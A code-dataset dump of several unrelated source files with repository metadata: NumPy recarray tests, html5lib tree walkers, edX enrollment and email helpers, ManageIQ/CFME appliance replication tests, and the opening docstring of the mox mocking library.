(0, ' ', 0.40000000596046448, 0)],
names='c1, c2, c3, c4')
assert_(ra.dtype == pa.dtype)
assert_(ra.shape == pa.shape)
for k in range(len(ra)):
assert_(ra[k].item() == pa[k].item())
def test_recarray_conflict_fields(self):
ra = np.rec.array([(1, 'abc', 2.3), (2, 'xyz', 4.2),
(3, 'wrs', 1.3)],
names='field, shape, mean')
ra.mean = [1.1, 2.2, 3.3]
assert_array_almost_equal(ra['mean'], [1.1, 2.2, 3.3])
assert_(type(ra.mean) is type(ra.var))
ra.shape = (1, 3)
assert_(ra.shape == (1, 3))
ra.shape = ['A', 'B', 'C']
assert_array_equal(ra['shape'], [['A', 'B', 'C']])
ra.field = 5
assert_array_equal(ra['field'], [[5, 5, 5]])
assert_(isinstance(ra.field, collections.Callable))
def test_fromrecords_with_explicit_dtype(self):
a = np.rec.fromrecords([(1, 'a'), (2, 'bbb')],
dtype=[('a', int), ('b', np.object)])
assert_equal(a.a, [1, 2])
assert_equal(a[0].a, 1)
assert_equal(a.b, ['a', 'bbb'])
assert_equal(a[-1].b, 'bbb')
#
ndtype = np.dtype([('a', int), ('b', np.object)])
a = np.rec.fromrecords([(1, 'a'), (2, 'bbb')], dtype=ndtype)
assert_equal(a.a, [1, 2])
assert_equal(a[0].a, 1)
assert_equal(a.b, ['a', 'bbb'])
assert_equal(a[-1].b, 'bbb')
def test_recarray_stringtypes(self):
# Issue #3993
a = np.array([('abc ', 1), ('abc', 2)],
dtype=[('foo', 'S4'), ('bar', int)])
a = a.view(np.recarray)
assert_equal(a.foo[0] == a.foo[1], False)
def test_recarray_returntypes(self):
qux_fields = {'C': (np.dtype('S5'), 0), 'D': (np.dtype('S5'), 6)}
a = np.rec.array([('abc ', (1,1), 1, ('abcde', 'fgehi')),
('abc', (2,3), 1, ('abcde', 'jklmn'))],
dtype=[('foo', 'S4'),
('bar', [('A', int), ('B', int)]),
('baz', int), ('qux', qux_fields)])
assert_equal(type(a.foo), np.ndarray)
assert_equal(type(a['foo']), np.ndarray)
assert_equal(type(a.bar), np.recarray)
assert_equal(type(a['bar']), np.recarray)
assert_equal(a.bar.dtype.type, np.record)
assert_equal(type(a['qux']), np.recarray)
assert_equal(a.qux.dtype.type, np.record)
assert_equal(dict(a.qux.dtype.fields), qux_fields)
assert_equal(type(a.baz), np.ndarray)
assert_equal(type(a['baz']), np.ndarray)
assert_equal(type(a[0].bar), np.record)
assert_equal(type(a[0]['bar']), np.record)
assert_equal(a[0].bar.A, 1)
assert_equal(a[0].bar['A'], 1)
assert_equal(a[0]['bar'].A, 1)
assert_equal(a[0]['bar']['A'], 1)
assert_equal(a[0].qux.D, asbytes('fgehi'))
assert_equal(a[0].qux['D'], asbytes('fgehi'))
assert_equal(a[0]['qux'].D, asbytes('fgehi'))
assert_equal(a[0]['qux']['D'], asbytes('fgehi'))
class TestRecord(TestCase):
def setUp(self):
self.data = np.rec.fromrecords([(1, 2, 3), (4, 5, 6)],
dtype=[("col1", "<i4"),
("col2", "<i4"),
("col3", "<i4")])
def test_assignment1(self):
a = self.data
assert_equal(a.col1[0], 1)
a[0].col1 = 0
assert_equal(a.col1[0], 0)
def test_assignment2(self):
a = self.data
assert_equal(a.col1[0], 1)
a.col1[0] = 0
assert_equal(a.col1[0], 0)
def test_invalid_assignment(self):
a = self.data
def assign_invalid_column(x):
x[0].col5 = 1
self.assertRaises(AttributeError, assign_invalid_column, a)
def test_out_of_order_fields(self):
"""Ticket #1431."""
x = self.data[['col1', 'col2']]
y = self.data[['col2', 'col1']]
assert_equal(x[0][0], y[0][1])
def test_pickle_1(self):
# Issue #1529
a = np.array([(1, [])], dtype=[('a', np.int32), ('b', np.int32, 0)])
assert_equal(a, pickle.loads(pickle.dumps(a)))
assert_equal(a[0], pickle.loads(pickle.dumps(a[0])))
def test_pickle_2(self):
a = self.data
assert_equal(a, pickle.loads(pickle.dumps(a)))
assert_equal(a[0], pickle.loads(pickle.dumps(a[0])))
def test_objview_record(self):
# https://github.com/numpy/numpy/issues/2599
dt = np.dtype([('foo', 'i8'), ('bar', 'O')])
r = np.zeros((1,3), dtype=dt).view(np.recarray)
r.foo = np.array([1, 2, 3]) # TypeError?
# https://github.com/numpy/numpy/issues/3256
ra = np.recarray((2,), dtype=[('x', object), ('y', float), ('z', int)])
ra[['x','y']] # TypeError?
def test_record_scalar_setitem(self):
# https://github.com/numpy/numpy/issues/3561
rec = np.recarray(1, dtype=[('x', float, 5)])
rec[0].x = 1
assert_equal(rec[0].x, np.ones(5))
def test_missing_field(self):
# https://github.com/numpy/numpy/issues/4806
arr = np.zeros((3,), dtype=[('x', int), ('y', int)])
assert_raises(ValueError, lambda: arr[['nofield']])
def test_find_duplicate():
l1 = [1, 2, 3, 4, 5, 6]
assert_(np.rec.find_duplicate(l1) == [])
l2 = [1, 2, 1, 4, 5, 6]
assert_(np.rec.find_duplicate(l2) == [1])
l3 = [1, 2, 1, 4, 1, 6, 2, 3]
assert_(np.rec.find_duplicate(l3) == [1, 2])
l3 = [2, 2, 1, 4, 1, 6, 2, 3]
assert_(np.rec.find_duplicate(l3) == [2, 1])
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | -9,075,986,738,709,981,000 | 38.023411 | 96 | 0.517569 | false |
blarghmatey/pip | pip/_vendor/html5lib/treewalkers/__init__.py | 499 | 5766 | """A collection of modules for iterating through different kinds of
tree, generating tokens identical to those produced by the tokenizer
module.
To create a tree walker for a new type of tree, you need to
implement a tree walker object (called TreeWalker by convention) that
implements a 'serialize' method taking a tree as sole argument and
returning an iterator generating tokens.
"""
from __future__ import absolute_import, division, unicode_literals
__all__ = ["getTreeWalker", "pprint", "dom", "etree", "genshistream", "lxmletree",
"pulldom"]
import sys
from .. import constants
from ..utils import default_etree
treeWalkerCache = {}
def getTreeWalker(treeType, implementation=None, **kwargs):
"""Get a TreeWalker class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - The xml.dom.minidom DOM implementation
"pulldom" - The xml.dom.pulldom event stream
"etree" - A generic walker for tree implementations exposing an
elementtree-like interface (known to work with
ElementTree, cElementTree and lxml.etree).
"lxml" - Optimized walker for lxml.etree
"genshi" - a Genshi stream
implementation - (Currently applies to the "etree" tree type only). A module
implementing the tree type e.g. xml.etree.ElementTree or
cElementTree."""
treeType = treeType.lower()
if treeType not in treeWalkerCache:
if treeType in ("dom", "pulldom"):
name = "%s.%s" % (__name__, treeType)
__import__(name)
mod = sys.modules[name]
treeWalkerCache[treeType] = mod.TreeWalker
elif treeType == "genshi":
from . import genshistream
treeWalkerCache[treeType] = genshistream.TreeWalker
elif treeType == "lxml":
from . import lxmletree
treeWalkerCache[treeType] = lxmletree.TreeWalker
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# XXX: NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeWalker
return treeWalkerCache.get(treeType)
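# Minimal usage sketch (assumed; `tree` stands for a caller-supplied
# ElementTree document and is not defined in this module):
def _example_walk(tree):
    TreeWalker = getTreeWalker("etree")
    return list(TreeWalker(tree))  # token dicts, ready for a serializer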
def concatenateCharacterTokens(tokens):
pendingCharacters = []
for token in tokens:
type = token["type"]
if type in ("Characters", "SpaceCharacters"):
pendingCharacters.append(token["data"])
else:
if pendingCharacters:
yield {"type": "Characters", "data": "".join(pendingCharacters)}
pendingCharacters = []
yield token
if pendingCharacters:
yield {"type": "Characters", "data": "".join(pendingCharacters)}
def pprint(walker):
"""Pretty printer for tree walkers"""
output = []
indent = 0
for token in concatenateCharacterTokens(walker):
type = token["type"]
if type in ("StartTag", "EmptyTag"):
# tag name
if token["namespace"] and token["namespace"] != constants.namespaces["html"]:
if token["namespace"] in constants.prefixes:
ns = constants.prefixes[token["namespace"]]
else:
ns = token["namespace"]
name = "%s %s" % (ns, token["name"])
else:
name = token["name"]
output.append("%s<%s>" % (" " * indent, name))
indent += 2
# attributes (sorted for consistent ordering)
attrs = token["data"]
for (namespace, localname), value in sorted(attrs.items()):
if namespace:
if namespace in constants.prefixes:
ns = constants.prefixes[namespace]
else:
ns = namespace
name = "%s %s" % (ns, localname)
else:
name = localname
output.append("%s%s=\"%s\"" % (" " * indent, name, value))
# self-closing
if type == "EmptyTag":
indent -= 2
elif type == "EndTag":
indent -= 2
elif type == "Comment":
output.append("%s<!-- %s -->" % (" " * indent, token["data"]))
elif type == "Doctype":
if token["name"]:
if token["publicId"]:
output.append("""%s<!DOCTYPE %s "%s" "%s">""" %
(" " * indent,
token["name"],
token["publicId"],
token["systemId"] if token["systemId"] else ""))
elif token["systemId"]:
output.append("""%s<!DOCTYPE %s "" "%s">""" %
(" " * indent,
token["name"],
token["systemId"]))
else:
output.append("%s<!DOCTYPE %s>" % (" " * indent,
token["name"]))
else:
output.append("%s<!DOCTYPE >" % (" " * indent,))
elif type == "Characters":
output.append("%s\"%s\"" % (" " * indent, token["data"]))
elif type == "SpaceCharacters":
assert False, "concatenateCharacterTokens should have got rid of all Space tokens"
else:
raise ValueError("Unknown token type, %s" % type)
return "\n".join(output)
| mit | -6,778,752,260,165,360,000 | 38.22449 | 94 | 0.522546 | false |
olexiim/edx-platform | lms/djangoapps/instructor/enrollment.py | 2 | 13610 | """
Enrollment operations for use by instructor APIs.
Does not include any access control, be sure to check access before calling.
"""
import json
from django.contrib.auth.models import User
from django.conf import settings
from django.core.urlresolvers import reverse
from django.core.mail import send_mail
from student.models import CourseEnrollment, CourseEnrollmentAllowed
from courseware.models import StudentModule
from edxmako.shortcuts import render_to_string
from submissions import api as sub_api # installed from the edx-submissions repository
from student.models import anonymous_id_for_user
from microsite_configuration import microsite
class EmailEnrollmentState(object):
""" Store the complete enrollment state of an email in a class """
def __init__(self, course_id, email):
exists_user = User.objects.filter(email=email).exists()
if exists_user:
user = User.objects.get(email=email)
mode, is_active = CourseEnrollment.enrollment_mode_for_user(user, course_id)
# is_active is `None` if the user is not enrolled in the course
exists_ce = is_active is not None and is_active
full_name = user.profile.name
else:
mode = None
exists_ce = False
full_name = None
ceas = CourseEnrollmentAllowed.objects.filter(course_id=course_id, email=email).all()
exists_allowed = ceas.exists()
state_auto_enroll = exists_allowed and ceas[0].auto_enroll
self.user = exists_user
self.enrollment = exists_ce
self.allowed = exists_allowed
self.auto_enroll = bool(state_auto_enroll)
self.full_name = full_name
self.mode = mode
def __repr__(self):
return "{}(user={}, enrollment={}, allowed={}, auto_enroll={})".format(
self.__class__.__name__,
self.user,
self.enrollment,
self.allowed,
self.auto_enroll,
)
def to_dict(self):
"""
example: {
'user': False,
'enrollment': False,
'allowed': True,
'auto_enroll': True,
}
"""
return {
'user': self.user,
'enrollment': self.enrollment,
'allowed': self.allowed,
'auto_enroll': self.auto_enroll,
}
def enroll_email(course_id, student_email, auto_enroll=False, email_students=False, email_params=None):
"""
Enroll a student by email.
`student_email` is the student's email address, e.g. "[email protected]"
`auto_enroll` determines what is put in CourseEnrollmentAllowed.auto_enroll
if auto_enroll is set, then the user will be enrolled in the course
automatically as soon as they register with that email.
`email_students` determines if student should be notified of action by email.
`email_params` parameters used while parsing email templates (a `dict`).
returns two EmailEnrollmentState's
representing state before and after the action.
"""
previous_state = EmailEnrollmentState(course_id, student_email)
if previous_state.user:
# if the student is currently unenrolled, don't enroll them in their
# previous mode
course_mode = u"honor"
if previous_state.enrollment:
course_mode = previous_state.mode
CourseEnrollment.enroll_by_email(student_email, course_id, course_mode)
if email_students:
email_params['message'] = 'enrolled_enroll'
email_params['email_address'] = student_email
email_params['full_name'] = previous_state.full_name
send_mail_to_student(student_email, email_params)
else:
cea, _ = CourseEnrollmentAllowed.objects.get_or_create(course_id=course_id, email=student_email)
cea.auto_enroll = auto_enroll
cea.save()
if email_students:
email_params['message'] = 'allowed_enroll'
email_params['email_address'] = student_email
send_mail_to_student(student_email, email_params)
after_state = EmailEnrollmentState(course_id, student_email)
return previous_state, after_state
def unenroll_email(course_id, student_email, email_students=False, email_params=None):
"""
Unenroll a student by email.
`student_email` is the student's email address, e.g. "[email protected]"
`email_students` determines if student should be notified of action by email.
`email_params` parameters used while parsing email templates (a `dict`).
returns two EmailEnrollmentState's
representing state before and after the action.
"""
previous_state = EmailEnrollmentState(course_id, student_email)
if previous_state.enrollment:
CourseEnrollment.unenroll_by_email(student_email, course_id)
if email_students:
email_params['message'] = 'enrolled_unenroll'
email_params['email_address'] = student_email
email_params['full_name'] = previous_state.full_name
send_mail_to_student(student_email, email_params)
if previous_state.allowed:
CourseEnrollmentAllowed.objects.get(course_id=course_id, email=student_email).delete()
if email_students:
email_params['message'] = 'allowed_unenroll'
email_params['email_address'] = student_email
# Since no User object exists for this student there is no "full_name" available.
send_mail_to_student(student_email, email_params)
after_state = EmailEnrollmentState(course_id, student_email)
return previous_state, after_state
def send_beta_role_email(action, user, email_params):
"""
Send an email to a user added or removed as a beta tester.
`action` is one of 'add' or 'remove'
`user` is the User affected
`email_params` parameters used while parsing email templates (a `dict`).
"""
if action == 'add':
email_params['message'] = 'add_beta_tester'
email_params['email_address'] = user.email
email_params['full_name'] = user.profile.name
elif action == 'remove':
email_params['message'] = 'remove_beta_tester'
email_params['email_address'] = user.email
email_params['full_name'] = user.profile.name
else:
raise ValueError("Unexpected action received '{}' - expected 'add' or 'remove'".format(action))
send_mail_to_student(user.email, email_params)
def reset_student_attempts(course_id, student, module_state_key, delete_module=False):
"""
Reset student attempts for a problem. Optionally deletes all student state for the specified problem.
In the previous instructor dashboard it was possible to modify/delete
modules that were not problems. That has been disabled for safety.
`student` is a User
`problem_to_reset` is the name of a problem e.g. 'L2Node1'.
To build the module_state_key, 'problem/' and course information will be appended to `problem_to_reset`.
Raises:
ValueError: `problem_state` is invalid JSON.
StudentModule.DoesNotExist: could not load the student module.
submissions.SubmissionError: unexpected error occurred while resetting the score in the submissions API.
"""
# Reset the student's score in the submissions API
# Currently this is used only by open assessment (ORA 2)
# We need to do this *before* retrieving the `StudentModule` model,
# because it's possible for a score to exist even if no student module exists.
if delete_module:
sub_api.reset_score(
anonymous_id_for_user(student, course_id),
course_id.to_deprecated_string(),
module_state_key.to_deprecated_string(),
)
module_to_reset = StudentModule.objects.get(
student_id=student.id,
course_id=course_id,
module_state_key=module_state_key
)
if delete_module:
module_to_reset.delete()
else:
_reset_module_attempts(module_to_reset)
def _reset_module_attempts(studentmodule):
"""
Reset the number of attempts on a studentmodule.
Throws ValueError if `problem_state` is invalid JSON.
"""
# load the state json
problem_state = json.loads(studentmodule.state)
# old_number_of_attempts = problem_state["attempts"]
problem_state["attempts"] = 0
# save
studentmodule.state = json.dumps(problem_state)
studentmodule.save()
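# Hypothetical illustration (not part of the original module) of the JSON
# round-trip performed above; the state shape is assumed.
def _reset_attempts_example():
    state = json.dumps({"attempts": 3, "done": True})
    problem_state = json.loads(state)
    problem_state["attempts"] = 0
    return json.dumps(problem_state)  # e.g. '{"attempts": 0, "done": true}'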
def get_email_params(course, auto_enroll, secure=True):
"""
Generate parameters used when parsing email templates.
`auto_enroll` is a flag for auto enrolling non-registered students: (a `boolean`)
Returns a dict of parameters
"""
protocol = 'https' if secure else 'http'
stripped_site_name = microsite.get_value(
'SITE_NAME',
settings.SITE_NAME
)
# TODO: Use request.build_absolute_uri rather than '{proto}://{site}{path}'.format
# and check with the Services team that this works well with microsites
registration_url = u'{proto}://{site}{path}'.format(
proto=protocol,
site=stripped_site_name,
path=reverse('student.views.register_user')
)
course_url = u'{proto}://{site}{path}'.format(
proto=protocol,
site=stripped_site_name,
path=reverse('course_root', kwargs={'course_id': course.id.to_deprecated_string()})
)
# We can't get the url to the course's About page if the marketing site is enabled.
course_about_url = None
if not settings.FEATURES.get('ENABLE_MKTG_SITE', False):
course_about_url = u'{proto}://{site}{path}'.format(
proto=protocol,
site=stripped_site_name,
path=reverse('about_course', kwargs={'course_id': course.id.to_deprecated_string()})
)
is_shib_course = uses_shib(course)
# Composition of email
email_params = {
'site_name': stripped_site_name,
'registration_url': registration_url,
'course': course,
'auto_enroll': auto_enroll,
'course_url': course_url,
'course_about_url': course_about_url,
'is_shib_course': is_shib_course,
}
return email_params
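# Usage sketch (assumed, not part of the original module): build the params
# once per course, then reuse them for each notification email.
def _example_enroll_with_email(course, student_email):
    params = get_email_params(course, auto_enroll=True)
    return enroll_email(course.id, student_email, auto_enroll=True,
                        email_students=True, email_params=params)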
def send_mail_to_student(student, param_dict):
"""
Construct the email using templates and then send it.
`student` is the student's email address (a `str`),
`param_dict` is a `dict` with keys
[
`site_name`: name given to edX instance (a `str`)
`registration_url`: url for registration (a `str`)
`course_id`: id of course (a `str`)
`auto_enroll`: user input option (a `str`)
`course_url`: url of course (a `str`)
`email_address`: email of student (a `str`)
`full_name`: student full name (a `str`)
`message`: type of email to send and template to use (a `str`)
`is_shib_course`: (a `boolean`)
]
Returns a boolean indicating whether the email was sent successfully.
"""
# Add some helpers and microsite config substitutions
if 'course' in param_dict:
param_dict['course_name'] = param_dict['course'].display_name_with_default
param_dict['site_name'] = microsite.get_value(
'SITE_NAME',
param_dict['site_name']
)
subject = None
message = None
# see if we are running in a microsite and that there is an
# activation email template definition available as configuration, if so, then render that
message_type = param_dict['message']
email_template_dict = {
'allowed_enroll': (
'emails/enroll_email_allowedsubject.txt',
'emails/enroll_email_allowedmessage.txt'
),
'enrolled_enroll': (
'emails/enroll_email_enrolledsubject.txt',
'emails/enroll_email_enrolledmessage.txt'
),
'allowed_unenroll': (
'emails/unenroll_email_subject.txt',
'emails/unenroll_email_allowedmessage.txt'
),
'enrolled_unenroll': (
'emails/unenroll_email_subject.txt',
'emails/unenroll_email_enrolledmessage.txt'
),
'add_beta_tester': (
'emails/add_beta_tester_email_subject.txt',
'emails/add_beta_tester_email_message.txt'
),
'remove_beta_tester': (
'emails/remove_beta_tester_email_subject.txt',
'emails/remove_beta_tester_email_message.txt'
),
'account_creation_and_enrollment': (
'emails/enroll_email_enrolledsubject.txt',
'emails/account_creation_and_enroll_emailMessage.txt'
),
}
subject_template, message_template = email_template_dict.get(message_type, (None, None))
if subject_template is not None and message_template is not None:
subject = render_to_string(subject_template, param_dict)
message = render_to_string(message_template, param_dict)
if subject and message:
# Remove leading and trailing whitespace from body
message = message.strip()
# Email subject *must not* contain newlines
subject = ''.join(subject.splitlines())
from_address = microsite.get_value(
'email_from_address',
settings.DEFAULT_FROM_EMAIL
)
send_mail(subject, message, from_address, [student], fail_silently=False)
def uses_shib(course):
"""
Used to return whether course has Shibboleth as the enrollment domain
Returns a boolean indicating if Shibboleth authentication is set for this course.
"""
return course.enrollment_domain and course.enrollment_domain.startswith(settings.SHIBBOLETH_DOMAIN_PREFIX)
| agpl-3.0 | -9,127,313,620,599,277,000 | 35.293333 | 112 | 0.645187 | false |
akarol/cfme_tests | cfme/tests/distributed/test_appliance_replication.py | 1 | 12939 | # -*- coding: utf-8 -*-
import pytest
from time import sleep
from six.moves.urllib.parse import urlparse
from cfme.base.ui import ServerView
from cfme.common.vm import VM
from cfme.infrastructure.provider import wait_for_a_provider
from cfme.utils.appliance import provision_appliance
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils.conf import credentials
from cfme.utils.generators import random_vm_name
from cfme.utils.log import logger
from cfme.utils.ssh import SSHClient
from cfme.utils.wait import wait_for
from cfme import test_requirements
pytestmark = [
pytest.mark.long_running,
test_requirements.distributed,
pytest.mark.uncollect(reason="test framework broke browser_steal"),
]
def get_ssh_client(hostname):
""" Returns fresh ssh client connected to given server using given credentials
"""
hostname = urlparse('scheme://' + hostname).netloc
connect_kwargs = {
'username': credentials['ssh']['username'],
'password': credentials['ssh']['password'],
'hostname': hostname,
}
return SSHClient(**connect_kwargs)
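# Usage sketch (assumed): the 'scheme://' prefix exists only so urlparse
# fills in netloc, letting callers pass a bare hostname or a full URL, e.g.
#   client = get_ssh_client('10.0.0.5')
#   client.run_command('uname -a')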
def get_replication_appliances(appliance):
"""Returns two database-owning appliances configured
with unique region numbers.
"""
ver_to_prov = str(appliance.version)
appl1 = provision_appliance(ver_to_prov, 'long-test_repl_A')
appl2 = provision_appliance(ver_to_prov, 'long-test_repl_B')
appl1.configure(region=1)
appl1.ipapp.wait_for_web_ui()
appl2.update_guid()
appl2.configure(region=2, key_address=appl1.hostname)
appl2.ipapp.wait_for_web_ui()
return appl1, appl2
def get_distributed_appliances(appliance):
"""Returns one database-owning appliance, and a second appliance
that connects to the database of the first.
"""
ver_to_prov = str(appliance.version)
appl1 = provision_appliance(ver_to_prov, 'long-test_childDB_A')
appl2 = provision_appliance(ver_to_prov, 'long-test_childDB_B')
appl1.configure(region=1)
appl1.ipapp.wait_for_web_ui()
appl2.configure(region=1, key_address=appl1.hostname, db_address=appl1.hostname)
appl2.ipapp.wait_for_web_ui()
return appl1, appl2
def configure_db_replication(db_address, appliance):
"""Enables the sync role and configures the appliance to replicate to
the db_address specified. Then, it waits for the UI to show the replication
as active and the backlog as empty.
"""
replication_conf = appliance.server.zone.region.replication
replication_conf.set_replication(
{'host': db_address}, 'global')
view = appliance.server.browser.create_view(ServerView)
view.flash.assert_message("Configuration settings saved for CFME Server") # may be partial
appliance.server.settings.enable_server_roles('database_synchronization')
rep_status, _ = wait_for(replication_conf.get_replication_status, fail_condition=False,
num_sec=360, delay=10,
fail_func=appliance.server.browser.refresh,
message="get_replication_status")
assert rep_status
wait_for(lambda: replication_conf.get_global_replication_backlog() == 0, fail_condition=False,
num_sec=120, delay=10,
fail_func=appliance.server.browser.refresh, message="get_replication_backlog")
@pytest.yield_fixture(scope="module")
def test_vm(virtualcenter_provider):
"""Fixture to provision appliance to the provider being tested if necessary"""
vm_name = random_vm_name('distpwr')
vm = VM.factory(vm_name, virtualcenter_provider)
if not virtualcenter_provider.mgmt.does_vm_exist(vm_name):
logger.info("deploying %r on provider %r", vm_name, virtualcenter_provider.key)
vm.create_on_provider(find_in_cfme=True, allow_skip="default")
else:
logger.info("recycling deployed vm %r on provider %r", vm_name, virtualcenter_provider.key)
yield vm
try:
virtualcenter_provider.mgmt.delete_vm(vm_name=vm_name)
except Exception:
logger.exception('Failed deleting VM "%r" on "%r"', vm_name, virtualcenter_provider.name)
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream")
def test_appliance_replicate_between_regions(request, virtualcenter_provider, appliance):
"""Tests that a provider added to an appliance in one region
is replicated to the parent appliance in another region.
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances(appliance)
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
configure_db_replication(appl2.hostname, appliance)
virtualcenter_provider.create()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream")
def test_external_database_appliance(request, virtualcenter_provider, appliance):
"""Tests that one appliance can externally
connect to the database of another appliance.
Metadata:
test_flag: replication
"""
appl1, appl2 = get_distributed_appliances(appliance)
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
virtualcenter_provider.create()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream")
def test_appliance_replicate_sync_role_change(request, virtualcenter_provider, appliance):
"""Tests that a role change is replicated
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances(appliance)
replication_conf = appliance.server.zone.region.replication
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
server_settings = appliance.server.settings
configure_db_replication(appl2.hostname, appliance)
# Replication is up and running, now disable DB sync role
server_settings.disable_server_roles('database_synchronization')
wait_for(replication_conf.get_replication_status, fail_condition=True, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
server_settings.enable_server_roles('database_synchronization')
wait_for(replication_conf.get_replication_status, fail_condition=False, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
assert replication_conf.get_replication_status()
virtualcenter_provider.create()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream", "5.7") # no config->diagnostics->replication tab in 5.7
def test_appliance_replicate_sync_role_change_with_backlog(request, virtualcenter_provider,
appliance):
"""Tests that a role change is replicated with backlog
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances(appliance)
replication_conf = appliance.server.zone.region.replication
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
server_settings = appliance.server.settings
configure_db_replication(appl2.hostname, appliance)
# Replication is up and running, now disable DB sync role
virtualcenter_provider.create()
server_settings.disable_server_roles('database_synchronization')
wait_for(replication_conf.get_replication_status, fail_condition=True, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
server_settings.enable_server_roles('database_synchronization')
wait_for(replication_conf.get_replication_status, fail_condition=False, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
assert replication_conf.get_replication_status()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream", "5.7") # no config->diagnostics->replication tab in 5.7
def test_appliance_replicate_database_disconnection(request, virtualcenter_provider, appliance):
"""Tests a database disconnection
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances(appliance)
replication_conf = appliance.server.zone.region.replication
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
configure_db_replication(appl2.hostname, appliance)
# Replication is up and running, now stop the DB on the replication parent
appl2.db.stop_db_service()
sleep(60)
appl2.db.start_db_service()
wait_for(replication_conf.get_replication_status, fail_condition=False, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
assert replication_conf.get_replication_status()
virtualcenter_provider.create()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream", "5.7") # no config->diagnostics->replication tab in 5.7
def test_appliance_replicate_database_disconnection_with_backlog(request, virtualcenter_provider,
appliance):
"""Tests a database disconnection with backlog
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances(appliance)
replication_conf = appliance.server.zone.region.replication
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
configure_db_replication(appl2.hostname, appliance)
# Replication is up and running, now stop the DB on the replication parent
virtualcenter_provider.create()
appl2.db.stop_db_service()
sleep(60)
appl2.db.start_db_service()
wait_for(replication_conf.get_replication_status, fail_condition=False, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
assert replication_conf.get_replication_status()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream", "5.7") # no config->diagnostics->replication tab in 5.7
def test_distributed_vm_power_control(request, test_vm, virtualcenter_provider, verify_vm_running,
                                      register_event, soft_assert, appliance):
"""Tests that a replication parent appliance can control the power state of a
VM being managed by a replication child appliance.
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances(appliance)
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
configure_db_replication(appl2.hostname, appliance)
virtualcenter_provider.create()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
register_event(target_type='VmOrTemplate', target_name=test_vm.name,
event_type='request_vm_poweroff')
register_event(target_type='VmOrTemplate', target_name=test_vm.name,
event_type='vm_poweroff')
test_vm.power_control_from_cfme(option=test_vm.POWER_OFF, cancel=False)
navigate_to(test_vm.provider, 'Details')
test_vm.wait_for_vm_state_change(desired_state=test_vm.STATE_OFF, timeout=900)
soft_assert(test_vm.find_quadicon().data['state'] == 'currentstate-off')
soft_assert(
not test_vm.provider.mgmt.is_vm_running(test_vm.name),
"vm running")
| gpl-2.0 | 7,100,716,636,166,888,000 | 37.055882 | 100 | 0.681428 | false |
patrickhartling/protobuf | python/mox.py | 603 | 38237 | #!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is used for testing. The original is at:
# http://code.google.com/p/pymox/
"""Mox, an object-mocking framework for Python.
Mox works in the record-replay-verify paradigm. When you first create
a mock object, it is in record mode. You then programmatically set
the expected behavior of the mock object (what methods are to be
called on it, with what parameters, what they should return, and in
what order).
Once you have set up the expected mock behavior, you put it in replay
mode. Now the mock responds to method calls just as you told it to.
If an unexpected method (or an expected method with unexpected
parameters) is called, then an exception will be raised.
Once you are done interacting with the mock, you need to verify that
all the expected interactions occurred. (Maybe your code exited
prematurely without calling some cleanup method!) The verify phase
ensures that every expected method was called; otherwise, an exception
will be raised.
